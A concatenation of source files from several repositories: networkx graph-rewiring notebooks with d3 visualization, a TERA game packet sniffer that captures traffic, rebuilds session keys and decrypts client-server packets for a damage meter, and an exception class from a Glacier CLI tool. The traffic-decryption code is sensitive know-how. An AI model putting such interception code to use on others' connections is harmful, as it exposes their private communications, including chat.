title("Original Graph")
figure()
nx.draw(rewired_graph)
title("Rewired Graph")
# <markdowncell>
# Interactive visualization
# ===
# Run both of the cells below, and the graph will display between them. Yes, it's awkward right now.
# <codecell>
graph_to_be_visualized = rewired_graph
import json
from networkx.readwrite import json_graph
data = json_graph.node_link_data(graph_to_be_visualized)
with open('graph.json', 'w') as f:
json.dump(data, f, indent=4)
from IPython.display import HTML
HTML(
"""<div id="d3-example"></div>
<style>
.node {stroke: #fff; stroke-width: 1.5px;}
.link {stroke: #999; stroke-opacity: .6;}
</style>"""
)
# <codecell>
from IPython.display import Javascript
Javascript(
"""
// We load the d3.js library from the Web.
require.config({paths: {d3: "http://d3js.org/d3.v3.min"}});
require(["d3"], function(d3) {
// The code in this block is executed when the
// d3.js library has been loaded.
// First, we specify the size of the canvas containing
// the visualization (size of the <div> element).
var width = 800,
height = 800;
// We create a color scale.
var color = d3.scale.category10();
// We create a force-directed dynamic graph layout.
var force = d3.layout.force()
.charge(-120)
.linkDistance(30)
.size([width, height]);
// In the <div> element, we create a <svg> graphic
// that will contain our interactive visualization.
var svg = d3.select("#d3-example").select("svg")
if (svg.empty()) {
svg = d3.select("#d3-example").append("svg")
.attr("width", width)
.attr("height", height);
}
// We load the JSON file.
d3.json("graph.json", function(error, graph) {
// In this block, the file has been loaded
// and the 'graph' object contains our graph.
// We load the nodes and links in the force-directed
// graph.
force.nodes(graph.nodes)
.links(graph.links)
.start();
// We create a <line> SVG element for each link
// in the graph.
var link = svg.selectAll(".link")
.data(graph.links)
.enter().append("line")
.attr("class", "link");
// We create a <circle> SVG element for each node
// in the graph, and we specify a few attributes.
var node = svg.selectAll(".node")
.data(graph.nodes)
.enter().append("circle")
.attr("class", "node")
.attr("r", 5) // radius
.style("fill", function(d) {
// The node color depends on the club.
return color(d.club);
})
.call(force.drag);
// The name of each node is the node number.
node.append("title")
.text(function(d) { return d.name; });
// We bind the positions of the SVG elements
// to the positions of the dynamic force-directed graph,
// at each time step.
force.on("tick", function() {
link.attr("x1", function(d) { return d.source.x; })
.attr("y1", function(d) { return d.source.y; })
.attr("x2", function(d) { return d.target.x; })
.attr("y2", function(d) { return d.target.y; });
node.attr("cx", function(d) { return d.x; })
.attr("cy", function(d) { return d.y; });
});
});
});
"""
)
# <markdowncell>
# "When we execute this cell, the HTML object created in the previous cell is updated. The graph is animated and interactive: we can click on nodes, see their labels, and move them within the canvas."
# Code from http://nbviewer.ipython.org/github/dboyliao/cookbook-code/blob/master/notebooks/chapter06_viz/04_d3.ipynb
```
#### File: network_clustering_growth/MRC_Notebook/SBM_rewiring_example.py
```python
import networkx as nx
import community
import random
from math import floor
import clusterrewire
%pylab inline
# <codecell>
def sbm(cmtysize, pin, pout):
graphs = []
for i in range(0, len(cmtysize)):
graphs.append(nx.gnp_random_graph(cmtysize[i], pin))
G=nx.disjoint_union_all(graphs)
s=[]
s.append(0)
for i in range(0, len(cmtysize)):
s.append(s[i-1]+cmtysize[i])
for i in range(0, len(cmtysize)):
for n in range(s[i], s[i+1]):
for m in range(s[i+1], G.number_of_nodes()):
if rand()<pout:
G.add_edge(n, m)
return G;
# <codecell>
g=sbm([20, 20, 20], .64, .5)
partition_before_rewire = community.best_partition(g)
sets_before_rewire = [[]]
for i in range(0, len(partition_before_rewire)):
s = partition_before_rewire[i]
if s>len(sets_before_rewire)-1:
sets_before_rewire.append([])
sets_before_rewire[s].append(i)
print(sets_before_rewire)
# <codecell>
imshow(nx.to_numpy_matrix(g))
title("Network before rewiring")
# <codecell>
A = nx.to_numpy_matrix(g)
A = clusterrewire.cluster_rewire_graph(A,
percent_of_edges_to_rewire=1,
verbose=False,
property_functions=None)
rewired_graph = nx.Graph(A)
# <codecell>
partition_after_rewire = community.best_partition(rewired_graph)
sets_after_rewire = [[]]
for i in range(0, len(partition_after_rewire)):
s = partition_after_rewire[i]
if s>len(sets_after_rewire)-1:
sets_after_rewire.append([])
sets_after_rewire[s].append(i)
print(sets_after_rewire)
imshow(nx.to_numpy_matrix(rewired_graph))
title("Adjacency after rewire")
```
#### File: network_clustering_growth/MRC_Notebook/Testing_Clustering_Growth_Fix_Edges.py
```python
import networkx as nx
def nt_np(G):
triangles=0 # 6 times number of triangles
contri=0 # 2 times number of connected triples
for v,d,t in nx.algorithms.cluster._triangles_and_degree_iter(G):
contri += d*(d-1)
triangles += t
if triangles==0: # we had no triangles or possible triangles
return 0.0, float(contri)
else:
return triangles/6.0, float(contri)/2.0
def find_door(g, hinges, A2):
neighbors = A2[array(hinges)]
neighbors_t_order = argsort(neighbors.flatten())
for e in arange(g.number_of_nodes()*2):
t_index = neighbors_t_order[e]
i,x = unravel_index(t_index, shape(neighbors))
hinge = hinges[i]
y = hinges[not i]
w = A2[hinge, y]
t = A2[hinge, x]
if w<=t:
break
if g.has_edge(hinge,x) and g.degree(x) > g.degree(y) and not g.edge[hinge][x]['fixed']:
return hinge, x, y
return None, None, None
def swing_door(g, hinge, x, y):
g.remove_edge(hinge, x)
g.add_edge(hinge, y, fixed=True)
return g
def one_move(g, A2):
w_order = argsort(A2.flatten())[::-1]
A = nx.adjacency_matrix(g)
edge_list = array(A).flatten()
for w_index in w_order:
if edge_list[w_index]:
continue
hinges = unravel_index(w_index, shape(A2))
hinge, x, y = find_door(g, hinges, A2)
if hinge:
g = swing_door(g, hinge, x, y)
return g, hinge, x, y
return None
# <codecell>
n_nodes = 100
p =.005
p = 1.5*log(n_nodes)/n_nodes
g = nx.erdos_renyi_graph(n=n_nodes, p=p)
#g = random_graphs.erdos_renyi_graph(n=n_nodes, p=p)
try_count = 1
max_tries = 1000
while not nx.is_connected(g):
g = nx.erdos_renyi_graph(n=n_nodes, p=p)
try_count += 1
if try_count>max_tries:
print("Can't make a connected graph. Tried %i times."%max_tries)
break
# <codecell>
nt, np = nt_np(g)
A = nx.adjacency_matrix(g)
A2 = A**2
change_percentage = 1
n_trials = floor(change_percentage*g.number_of_edges())
Cs = [nt/np]
C_locals = [nx.average_clustering(g)]
mean_k = [mean(g.degree().values())]
pl = [nx.average_shortest_path_length(g)]
initial_degrees = g.degree().values()
# <codecell>
for i,j in g.edges_iter():
g[i][j]['fixed'] = False
print("Attempting %i trials"%n_trials)
for k in arange(n_trials):
#print k
if not k%10:
print("Rewiring %i out of %i-----------------------------------"%(k,n_trials))
A2 = array(A2)
fill_diagonal(A2, 0)
outputs = one_move(g, A2)
if not outputs:
print("Couldn't make a move!")
break
else:
g, hinge, x, y = outputs
w = A2[hinge, y]
t = A2[hinge, x]
#nt = nt + w - t
#np = np + g.degree(y) - g.degree(x) + 1
nt, np = nt_np(g)
A = nx.adjacency_matrix(g)
A2 = A**2 #To be accelerated by A2(new) = A2(old) + AN + NA + N**2 where N is A(new)-A(old)
# N = zeros(shape(A))
# N[hinge,x] = N[x, hinge] = 1
# N[hinge,y] = N[y, hinge] = -1
# A2 = A2 + AN + NA + N**2
mean_k.append(mean(g.degree().values()))
Cs.append(nt/np)
pl.append(nx.average_shortest_path_length(g))
C_locals.append(nx.average_clustering(g))
#if not k%10:
#figure()
#nx.draw_spectral(g)
# <codecell>
print("Rewired %.1f percent of edges"%(100*float(k)/n_trials))
# <codecell>
end_degrees = g.degree().values()
# <codecell>
Cs = array(Cs)
C_locals = array(C_locals)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Clustering")
ylabel("Total Clustering", color='b')
twinx()
plot(arange(k+1)/k, C_locals/C_locals[0], color='r', label="Clustering Local")
ylabel("Average Local Clustering", color='r')
title("Clustering Goes Up, With Two Definitions")
xlabel("Percent of Rewirings")
# <codecell>
Cs = array(Cs)
C_locals = array(C_locals)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Total (Triange Density)")
#ylabel("Total Clustering", color='b')
plot(arange(k+1)/k, C_locals/C_locals[0], color='r', label="Avg. Local")
#ylabel("Average Local Clustering", color='r')
ylabel("Clustering Increase From Initial")
title("Clustering Goes Up, With Two Definitions")
xlabel("Percent of Rewirings")
lg = legend(loc=4)
lg.draw_frame(False)
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Clustering_Increases.pdf")
# <codecell>
Cs = array(Cs)
pl = array(pl)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Clustering")
ylabel("Total Clustering", color='b')
xlabel("Percent of Rewirings")
ax = gca()
ax.spines['top'].set_visible(False)
ax.get_xaxis().tick_bottom()
twinx()
plot(arange(k+1)/k, pl/pl[0], color='r', label="Average Path Length")
ylabel("Average Path Length", color='r')
title("Path Length Also Increases, Though More Slowly")
ax = gca()
ax.spines['top'].set_visible(False)
ax.get_xaxis().tick_bottom()
savefig("Model-Clustering_vs_Path_Length.pdf")
# <codecell>
Gamma = Cs/Cs[0]
Lambda = pl/pl[0]
swi = Gamma/Lambda
f = figure()
ax = f.add_subplot(1,1,1)
x = arange(k+1)/k
plot(x,swi)
text(.7, .5, "Clustering / Path Length,\nCompared to Random", transform=ax.transAxes, horizontalalignment='center')
ylabel("Small World Index")
xlabel("Percent of Rewirings")
title("Small World Index Grows with Rewiring, then Plateaus")
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Small_World_Index.pdf")
# <codecell>
hist(initial_degrees, label='Initial', normed=True)
hist(end_degrees, alpha=.8, label='After Rewiring', normed=True)
legend()
title("Degree Distribution Changes With Rewiring")
ylabel("p(Degree)")
xlabel("Degree")
lg = legend()
lg.draw_frame(False)
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Degree_Distribution.pdf")
# <codecell>
from IPython.html import widgets
from IPython.display import display
from eventful_graph import EventfulGraph, empty_eventfulgraph_hook
from widget_forcedirectedgraph import ForceDirectedGraphWidget, publish_js
publish_js()
# <codecell>
floating_container = widgets.PopupWidget(default_view_name='ModalView')
floating_container.description = "Dynamic D3 rendering of a NetworkX graph"
floating_container.button_text = "Render Window"
floating_container.set_css({
'width': '420px',
'height': '350px'}, selector='modal')
#G = EventfulGraph()
d3 = ForceDirectedGraphWidget(g)
floating_container.children = [d3]
display(floating_container)
# <codecell>
from networkx.generators import random_graphs
from networkx.generators import classic
# Add a listener to the eventful graph's construction method.
# If an eventful graph is created, build and show a widget
# for the graph.
def handle_graph(graph):
print(graph.graph._sleep)
popup = widgets.PopupWidget()
popup.description = "NetworkX Graph"
popup.button_text = "Render Window"
popup.set_css({
'width': '420px',
'height': '350px'}, selector='modal')
graph_widget = ForceDirectedGraphWidget(graph)
popup.children = [graph_widget]
display(popup)
EventfulGraph.on_constructed(handle_graph)
# Replace the empty graph of the networkx classic module with
# the eventful graph type.
random_graphs.empty_graph = empty_eventfulgraph_hook(sleep=0.2)
# <codecell>
import d3py
with d3py.NetworkXFigure(g, name="graph",width=1000, height=1000) as p:
p += d3py.ForceLayout()
p.css['.node'] = {'fill': 'blue', 'stroke': 'magenta'}
p.save_to_files()
p.show()
```
|
{
"source": "jeff-alves/Tera",
"score": 3
}
|
#### File: Tera/core/block_splitter.py
```python
from Queue import Queue
from datetime import datetime
from threading import Thread
from core.bytes import Bytes
class BlockSplitter(Thread):
def __init__(self, direction, msg_queue):
Thread.__init__(self)
self.setDaemon(True)
self.bytes = Queue()
self.enable = True
self.msg_queue = msg_queue
self.direction = direction
def run(self):
while self.enable:
block_size = self.bytes.get() | self.bytes.get() << 8
opcode = self.bytes.get() | self.bytes.get() << 8
block = Bytes()
while block.len() < block_size - 4:
block.append(self.bytes.get())
self.msg_queue.put((datetime.utcnow(), self.direction, opcode, block))
def stop(self):
self.enable = False
def add_data(self, data):
for byte in data:
self.bytes.put(byte)
```
#### File: Tera/core/connection_handler.py
```python
from Queue import Queue
from threading import Thread
from crypt.session import Session
from game.services.hot_dot_database import HotDotDatabase
from game.services.npc_database import NpcDatabase
from game.services.server_database import ServerDatabase
from game.services.skill_database import SkillDatabase
from net.ip import Ip
from net.tcp import Tcp
from ui.main_window import MainWindow
class ConnectionHandler(Thread):
def __init__(self, c_splitter, s_splitter):
Thread.__init__(self)
self.setDaemon(True)
self.queue = Queue()
self.enable = True
self.c_splitter = c_splitter
self.s_splitter = s_splitter
self.server_keys = []
self.client_keys = []
self.servers_db = ServerDatabase()
def run(self):
print('Waiting to initial connection to server...')
while not self.servers_db.selected:
ip = Ip(self.queue.get())
if ip.protocol != 6: continue
tcp = Tcp(ip.data)
if len(tcp.data) == 4 and tcp.data.get_array_int(1) == [1, 0, 0, 0]:
self.servers_db.selected = self.servers_db[ip.source_addr]
print('Conected to: ' + self.servers_db.selected['name'])
MainWindow().SetServerName(self.servers_db.selected['name'])
while len(self.server_keys) < 2 or len(self.client_keys) < 2:
ip = Ip(self.queue.get())
if ip.protocol != 6 or (ip.source_addr != self.servers_db.selected['ip'] and ip.destination_addr != self.servers_db.selected['ip']): continue
tcp = Tcp(ip.data)
if tcp.data.len() == 128:
if ip.source_addr == self.servers_db.selected['ip']: # received
self.server_keys.append(tcp.data)
else: # sent
self.client_keys.append(tcp.data)
self.session = Session(self.server_keys, self.client_keys)
SkillDatabase().read(self.servers_db.selected['location'])
HotDotDatabase().read(self.servers_db.selected['location'])
NpcDatabase().read(self.servers_db.selected['location'])
while self.enable:
ip = Ip(self.queue.get())
if ip.protocol != 6 or (ip.source_addr != self.servers_db.selected['ip'] and ip.destination_addr != self.servers_db.selected['ip']): continue
tcp = Tcp(ip.data)
if not tcp.data.len(): continue
if ip.source_addr == self.servers_db.selected['ip']: # received
self.session.encrypt(tcp.data)
self.s_splitter.add_data(tcp.data)
else: # sent
self.session.decrypt(tcp.data)
self.c_splitter.add_data(tcp.data)
def stop(self):
self.enable = False
```
#### File: Tera/core/messages_handler.py
```python
from Queue import Queue
from threading import Thread
from game.message.C.C_CHECK_VERSION import C_CHECK_VERSION
from game.message.opcodes_database import OpcodesDatabase
from game.tracker import Tracker
class MessagesHandler(Thread):
def __init__(self):
Thread.__init__(self)
self.setDaemon(True)
self.messages = Queue()
self.enable = True
self.opcodes_db = OpcodesDatabase()
self.tracker = Tracker()
def run(self):
while not self.opcodes_db.opcodes_v:
msg = self.messages.get()
if msg[2] == 19900:
self.opcodes_db.read(str(C_CHECK_VERSION(self.tracker, msg[0], msg[1], msg[2], msg[3]).ver[0][1]))
print('Using opcodes: ' + str(self.opcodes_db.opcodes_v))
while self.enable:
msg = self.messages.get()
cls = self.opcodes_db.get(msg[2])
if cls:
try:
cls(self.tracker, msg[0], msg[1], msg[2], msg[3])
except Exception as e:
print(e, cls, msg[3].get_array_hex(1))
def stop(self):
self.enable = False
```
#### File: Tera/crypt/cryptor.py
```python
from sha import Sha
from core.bytes import Bytes
from cryptor_key import CryptorKey
from util.util import to_bytes, to_int32
class Cryptor(object):
def __init__(self, key):
self._key = [CryptorKey(55, 31), CryptorKey(57, 50), CryptorKey(58, 39)]
self._change_len = 0
self._change_data = 0
buf = self.fill_key(key)
for i in xrange(0, 680, 20):
sha = Sha().digest(buf)
for j in xrange(0, 5):
pos = i + (j * 4)
b = to_bytes(sha[j])
buf[pos:pos + len(b)] = b
for i in xrange(0, 220, 4):
self._key[0].buffer[i / 4] = to_int32(buf, i)
for i in xrange(0, 228, 4):
self._key[1].buffer[i / 4] = to_int32(buf, 220 + i)
for i in xrange(0, 232, 4):
self._key[2].buffer[i / 4] = to_int32(buf, 448 + i)
def fill_key(self, key):
result = Bytes([0] * 680)
for i in xrange(0, 680):
result[i] = key[i % 128]
result[0] = 128
return result
def apply_cryptor(self, buf, size):
pre = size if size < self._change_len else self._change_len
if pre != 0:
for i in xrange(0, pre):
buf[i] ^= (self._change_data >> (8 * (4 - self._change_len + i))) & 0xFF
self._change_len -= pre
size -= pre
for i in xrange(pre, buf.len() - 3, 4):
result = self._key[0].key & self._key[1].key | self._key[2].key & (self._key[0].key | self._key[1].key)
for j in xrange(0, 3):
k = self._key[j]
if result == k.key:
t1 = k.buffer[k.pos1] & 0xFFFFFFFF
t2 = k.buffer[k.pos2] & 0xFFFFFFFF
t3 = t1 if t1 <= t2 else t2
k.sum = (t1 + t2) & 0xFFFFFFFF
k.key = 1 if t3 > k.sum else 0
k.pos1 = (k.pos1 + 1) % k.size
k.pos2 = (k.pos2 + 1) % k.size
buf[i] ^= k.sum & 0xFF
buf[i + 1] ^= (k.sum >> 8) & 0xFF
buf[i + 2] ^= (k.sum >> 16) & 0xFF
buf[i + 3] ^= (k.sum >> 24) & 0xFF
remain = size & 3
if remain != 0:
result = self._key[0].key & self._key[1].key | self._key[2].key & (self._key[0].key | self._key[1].key)
self._change_data = 0
for j in xrange(0, 3):
k = self._key[j]
if result == k.key:
t1 = k.buffer[k.pos1] & 0xFFFFFFFF
t2 = k.buffer[k.pos2] & 0xFFFFFFFF
t3 = t1 if t1 <= t2 else t2
k.sum = (t1 + t2) & 0xFFFFFFFF
k.key = 1 if t3 > k.sum else 0
k.pos1 = (k.pos1 + 1) % k.size
k.pos2 = (k.pos2 + 1) % k.size
self._change_data ^= (k.sum & 0xFFFFFFFF)
for j in xrange(0, remain):
buf[size + pre - remain + j] ^= (self._change_data >> (j * 8)) & 0xFF
self._change_len = 4 - remain
```
#### File: Tera/crypt/session.py
```python
from core.bytes import Bytes
from crypt.cryptor import Cryptor
from util.util import shift_key, xor_key
class Session(object):
def __init__(self, server_keys, client_keys):
self.client_key1 = client_keys[0]
self.client_key2 = client_keys[1]
self.server_key1 = server_keys[0]
self.server_key2 = server_keys[1]
self.tmp_key_1 = shift_key(self.server_key1, 67)
self.tmp_key_2 = xor_key(self.tmp_key_1, self.client_key1)
self.tmp_key_1 = shift_key(self.client_key2, 29, False)
self.decrypt_key = xor_key(self.tmp_key_1, self.tmp_key_2)
self.decryptor = Cryptor(self.decrypt_key)
self.tmp_key_1 = shift_key(self.server_key2, 41)
self.decryptor.apply_cryptor(self.tmp_key_1, 128)
self.encrypt_key = Bytes([0] * 128)
self.encrypt_key[0:128] = self.tmp_key_1[0:128]
self.encryptor = Cryptor(self.encrypt_key)
def encrypt(self, data):
self.encryptor.apply_cryptor(data, data.len())
def decrypt(self, data):
self.decryptor.apply_cryptor(data, data.len())
```
#### File: message/S/S_EACH_SKILL_RESULT.py
```python
from game.services.server_database import ServerDatabase
from util.enums import SkillType
from util.tipo import tipo
class S_EACH_SKILL_RESULT(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
data.skip(4)
source_id = data.read(tipo.uint64)
if ServerDatabase().selected['location'] == "KR": data.skip(8)
dic['target_id'] = data.read(tipo.uint64)
# I think it s some kind of source ID.
# When I use a skill against any monstrer, it s always the same value
# When I pick up a mana mote, differente ID
unk1 = data.read(tipo.uint32)
dic['skill_id'] = data.read(tipo.int32) & 0x3FFFFFF
# Not sure if it s a int32. or int16 or int64 or other thing
# When using a skill with many hit, each hit seem to have a different number (ex: 0, 1, 2, or 3)
dic['hit_id'] = data.read(tipo.int32)
# No fucking idea. I think I see 3 different part in that thing
data.skip(12) # unknown, id, time
dic['amount'] = data.read(tipo.int32)
dic['type'] = SkillType(data.read(tipo.int32))
dic['is_critical'] = (data.read(tipo.uint16) & 1) != 0
dic['knockdown'] = (data.read(tipo.byte) & 1) != 0
data.skip(4)
dic['position'] = data.read(tipo.float, 3)
dic['angle'] = data.read(tipo.angle) * 360. / 0x10000
tracker.get_entity(source_id).skill(dic)
```
#### File: message/S/S_LOGIN.py
```python
from util.enums import Race, Gender, PlayerClass, Category
from util.tipo import tipo
class S_LOGIN(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
name_offset = data.read(tipo.offset)
data.skip(8)
model = data.read(tipo.uint32)
dic['race'] = Race((model - 100) / 200 % 50)
dic['gender'] = Gender(model / 100 % 2)
dic['class'] = PlayerClass(model % 100)
id = data.read(tipo.uint64)
dic['server_id'] = data.read(tipo.uint32)
dic['player_id'] = data.read(tipo.uint32)
data.skip(name_offset - 34)
dic['name'] = data.read(tipo.string)
dic['category'] = Category.Player
tracker.player = tracker.get_entity(id)
tracker.player.login(dic)
```
#### File: message/S/S_SPAWN_NPC.py
```python
from game.services.npc_database import NpcDatabase
from game.services.server_database import ServerDatabase
from util.enums import Category
from util.tipo import tipo
class S_SPAWN_NPC(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
data.skip(6)
if ServerDatabase().selected['location'] == "KR": data.skip(4) # not sure what's there
id = data.read(tipo.uint64)
dic['target'] = data.read(tipo.uint64)
dic['pos'] = data.read(tipo.float, 3)
dic['angle'] = data.read(tipo.angle) * 360. / 0x10000
data.skip(4)
npc_id = data.read(tipo.uint32)
npc_area = data.read(tipo.uint16)
dic['category_id'] = data.read(tipo.uint32)
data.skip(31)
dic['owner_id'] = data.read(tipo.uint64)
dic['category'] = Category.NPC
dic.update(NpcDatabase().get((npc_area, npc_id), {'npc_area':npc_area, 'npc_id':npc_id}))
tracker.get_entity(id).spaw(dic)
```
#### File: message/S/S_SPAWN_USER.py
```python
from util.enums import Category, Race, Gender, PlayerClass
from util.tipo import tipo
class S_SPAWN_USER(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
data.skip(8)
name_offset = data.read(tipo.offset)
data.skip(16)
dic['server_id'] = data.read(tipo.uint32)
dic['player_id'] = data.read(tipo.uint32)
id = data.read(tipo.uint64)
dic['pos'] = data.read(tipo.float, 3)
dic['angle'] = data.read(tipo.angle) * 360. / 0x10000
data.skip(4)
model = data.read(tipo.uint32)
dic['race'] = Race((model - 100) / 200 % 50)
dic['gender'] = Gender(model / 100 % 2)
dic['class'] = PlayerClass(model % 100)
data.skip(11)
dic['dead'] = (data.read(tipo.byte) & 1) == 0
data.poss = name_offset - 4
dic['name'] = data.read(tipo.string)
dic['guild_name'] = data.read(tipo.string)
dic['category'] = Category.User
tracker.get_entity(id).spaw(dic)
```
#### File: message/S/S_USER_STATUS.py
```python
from util.tipo import tipo
class S_USER_STATUS(object):
def __init__(self, tracker, time, direction, opcode, data):
dic = {}
id = data.read(tipo.uint64)
dic['in_battle'] = data.read(tipo.byte)
tracker.get_entity(id).status(dic)
```
#### File: message/unused/S_ABNORMALITY_END.py
```python
from util.tipo import tipo
class S_ABNORMALITY_END(object):
def __init__(self, tracker, time, direction, opcode, data):
target = data.read(tipo.uint64)
abnormality_id = data.read(tipo.uint32)
```
#### File: message/unused/S_ACTION_STAGE.py
```python
from util.tipo import tipo
class S_ACTION_STAGE(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
effects_count = data.read(tipo.count)
effects_offset = data.read(tipo.offset)
source = data.read(tipo.uint64)
pos = data.read(tipo.float, 3)
angle = data.read(tipo.angle)*360./0x10000
model = data.read(tipo.uint32)
skill = data.read(tipo.uint32) # & 0x3FFFFFF
stage = data.read(tipo.uint32)
speed = data.read(tipo.float)
id = data.read(tipo.uint32)
unk = data.read(tipo.float)
```
#### File: message/unused/S_GET_USER_LIST.py
```python
from util.tipo import tipo
class S_GET_USER_LIST(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
count = data.read(tipo.count)
offset = data.read(tipo.offset)
player_guilds = []
for i in xrange(1, count + 1):
data.poss = offset - 4
pointer = data.read(tipo.uint16)
next_offset = data.read(tipo.uint16)
data.skip(16)
player_id = data.read(tipo.uint32)
data.skip(286)
guild_id = data.read(tipo.uint32)
offset = next_offset
player_guilds.append((player_id, guild_id))
```
#### File: message/unused/S_PRIVATE_CHAT.py
```python
from util.tipo import tipo
class S_PRIVATE_CHAT(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
data.skip(4) # offsets
Channel = data.read(tipo.uint32)
AuthorId = data.read(tipo.uint64)
AuthorName = data.read(tipo.string)
Text = data.read(tipo.string)
```
#### File: message/unused/S_RESET_CHARM_STATUS.py
```python
from util.tipo import tipo
class S_RESET_CHARM_STATUS(object):
def __init__(self, tracker, time, direction, opcode, data):
print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
count = data.read(tipo.uint16)
offset = data.read(tipo.uint16)
target_id = data.read(tipo.uint64)
charms = []
for i in xrange(1, count + 1):
data.skip(2) # offset pointer
data.skip(2) # next member offset
charmId = data.read(tipo.uint32)
duration = data.read(tipo.uint32)
status = data.read(tipo.byte)
charms.append(status, charmId, duration)
```
#### File: game/services/icon_database.py
```python
import os
from zipfile import ZipFile
from wx.lib.embeddedimage import PyEmbeddedImage
from util.util import singleton
@singleton
class IconDatabase(dict):
def __init__(self):
dict.__init__(self)
with ZipFile('data/icons.zip') as f:
for name_f in f.namelist():
name, ext = name_f.rsplit('.', 1)
if ext == 'png':
self.add(name, PyEmbeddedImage(f.read(name_f), False))
for f in os.listdir("data/class-icons/"):
name, ext = f.rsplit('.', 1)
if ext == 'png':
with open("data/class-icons/" + f, 'rb') as file:
self.add(name, PyEmbeddedImage(file.read(), False))
for f in os.listdir("res/"):
name, ext = f.rsplit('.', 1)
if ext == 'png' or ext == 'ico':
with open("res/" + f, 'rb') as file:
self.add(name, PyEmbeddedImage(file.read(), False))
def add(self, name, img):
self[name] = img
```
#### File: Tera/game/tracker.py
```python
from game.trackers.abnormality import Abnormality
from game.trackers.entity import Entity
from game.trackers.party import Party
from util.util import singleton
@singleton
class Tracker(object):
def __init__(self):
self.entity = {} # Entities
self.player = None
self.party = Party(self)
self.abnormality = Abnormality(self)
def get_entity(self, id):
e = self.entity.get(id)
if not e:
e = Entity(self)
self.entity[id] = e
return e
```
|
{
"source": "JeffAlyanak/amazon-glacier-cmd-interface",
"score": 2
}
|
#### File: amazon-glacier-cmd-interface/glacier/glacierexception.py
```python
import traceback
import re
import sys
import logging
"""
**********
Note by wvmarle:
This file contains the complete code from chained_exception.py plus the
error handling code from GlacierWrapper.py, allowing it to be used in other
modules like glaciercorecalls as well.
**********
"""
class GlacierException(Exception):
"""
An extension of the built-in Exception class, this handles
an additional cause keyword argument, adding it as cause
attribute to the exception message.
It logs the error message (amount of information depends on the log
level) and passes it on to a higher level to handle.
Furthermore it allows for the upstream handler to call for a
complete stack trace or just a simple error and cause message.
TODO: describe usage.
"""
ERRORCODE = {'InternalError': 127, # Library internal error.
'UndefinedErrorCode': 126, # Undefined code.
'NoResults': 125, # Operation yielded no results.
'GlacierConnectionError': 1, # Can not connect to Glacier.
'SdbConnectionError': 2, # Can not connect to SimpleDB.
'CommandError': 3, # Command line is invalid.
'VaultNameError': 4, # Invalid vault name.
'DescriptionError': 5, # Invalid archive description.
'IdError': 6, # Invalid upload/archive/job ID given.
'RegionError': 7, # Invalid region given.
'FileError': 8, # Error related to reading/writing a file.
'ResumeError': 9, # Problem resuming a multipart upload.
'NotReady': 10, # Requested download is not ready yet.
'BookkeepingError': 11, # Bookkeeping not available.
'SdbCommunicationError': 12, # Problem reading/writing SimpleDB data.
'ResourceNotFoundException': 13, # Glacier can not find the requested resource.
'InvalidParameterValueException': 14, # Parameter not accepted.
'DownloadError': 15, # Downloading an archive failed.
'SNSConnectionError': 126, # Can not connect to SNS
'SNSConfigurationError': 127, # Problem with configuration file
'SNSParameterError':128, # Problem with arguments passed to SNS
}
def __init__(self, message, code=None, cause=None):
"""
Constructor. Logs the error.
:param message: the error message.
:type message: str
:param code: the error code.
:type code: str
:param cause: explanation on what caused the error.
:type cause: str
"""
self.logger = logging.getLogger(self.__class__.__name__)
self.exitcode = self.ERRORCODE[code] if code in self.ERRORCODE else 254
self.code = code
if cause:
self.logger.error('ERROR: %s'% cause)
self.cause = cause if isinstance(cause, tuple) else (cause,)
self.stack = traceback.format_stack()[:-2]
else:
self.logger.error('An error occurred, exiting.')
self.cause = ()
# Just wrap up a cause-less exception.
# Get the stack trace for this exception.
self.stack = (
traceback.format_stack()[:-2] +
traceback.format_tb(sys.exc_info()[2]))
# ^^^ let's hope the information is still there; caller must take
# care of this.
self.message = message
self.logger.info(self.fetch(message=True))
self.logger.debug(self.fetch(stack=True))
if self.exitcode == 254:
self.logger.debug('Unknown error code: %s.'% code)
# Works as a generator to help get the stack trace and the cause
# written out.
def causeTree(self, indentation=' ', alreadyMentionedTree=[], stack=False, message=False):
"""
Returns a complete stack tree, an error message, or both.
Returns a warning if neither stack or message are True.
"""
if stack:
yield "Traceback (most recent call last):\n"
ellipsed = 0
for i, line in enumerate(self.stack):
if (ellipsed is not False
and i < len(alreadyMentionedTree)
and line == alreadyMentionedTree[i]):
ellipsed += 1
else:
if ellipsed:
yield " ... (%d frame%s repeated)\n" % (
ellipsed,
"" if ellipsed == 1 else "s")
ellipsed = False # marker for "given out"
yield line
if message:
exc = self if self.message is None else self.message
for line in traceback.format_exception_only(exc.__class__, exc):
yield line
if self.cause:
yield ("Caused by: %d exception%s\n" %
(len(self.cause), "" if len(self.cause) == 1 else "s"))
for causePart in self.cause:
if hasattr(causePart,"causeTree"):
for line in causePart.causeTree(indentation, self.stack):
yield re.sub(r'([^\n]*\n)', indentation + r'\1', line)
else:
for line in traceback.format_exception_only(causePart.__class__, causePart):
yield re.sub(r'([^\n]*\n)', indentation + r'\1', line)
if not message and not stack:
yield ('No output. Specify message=True and/or stack=True \
to get output when calling this function.\n')
def write(self, stream=None, indentation=' ', message=False, stack=False):
"""
Writes the error details to sys.stderr or a stream.
"""
stream = sys.stderr if stream is None else stream
for line in self.causeTree(indentation, message=message, stack=stack):
stream.write(line)
